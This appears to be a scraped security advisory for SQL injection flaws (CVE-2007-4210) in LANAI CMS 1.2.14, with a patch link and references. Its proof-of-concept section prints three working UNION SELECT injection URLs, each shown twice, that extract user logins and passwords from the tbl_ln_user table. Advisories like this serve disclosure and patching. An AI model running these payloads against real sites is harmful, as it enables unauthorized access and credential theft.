LANAI CMS Multiple SQL Injection Vulnerabilities
BID:25193
Info
LANAI CMS Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 25193 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4210 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 03 2007 12:00AM |
| Updated: | Aug 31 2007 06:02PM |
| Credit: | k1tk4t is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
RedLine Software LANAI CMS 1.2.14 |
| Not Vulnerable: | |
Discussion
LANAI CMS Multiple SQL Injection Vulnerabilities
LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.
LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.
Exploit / POC
LANAI CMS Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,userLogin,userPassword,5,6,7/**/FROM/**/tbl_ln_user/*
http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,'-',userPassword),4,5/**/FROM/**/tbl_ln_user/*
http://www.example.com/module.php?modname=gallery&mf=view&gid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,userLogin,userPassword,4/**/FROM/**/tbl_ln_user/*
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,userLogin,userPassword,5,6,7/**/FROM/**/tbl_ln_user/*
http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,'-',userPassword),4,5/**/FROM/**/tbl_ln_user/*
http://www.example.com/module.php?modname=gallery&mf=view&gid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,userLogin,userPassword,4/**/FROM/**/tbl_ln_user/*
Solution / Fix
LANAI CMS Multiple SQL Injection Vulnerabilities
Solution:
The vendor released fixes to address these issues. Please see the references for more information.
RedLine Software LANAI CMS 1.2.14
Solution:
The vendor released fixes to address these issues. Please see the references for more information.
RedLine Software LANAI CMS 1.2.14
-
RedLine Software patch_CVE-2007-4210_25193.zip
http://downloads.sourceforge.net/la-nai/patch_CVE-2007-4210_25193.zip? use_mirror=osdn
References
LANAI CMS Multiple SQL Injection Vulnerabilities
References:
References:
- LANAI CMS Homepage (RedLine Software)
- la-nai cms_v1.2.14 - Remote SQL Injection ([email protected])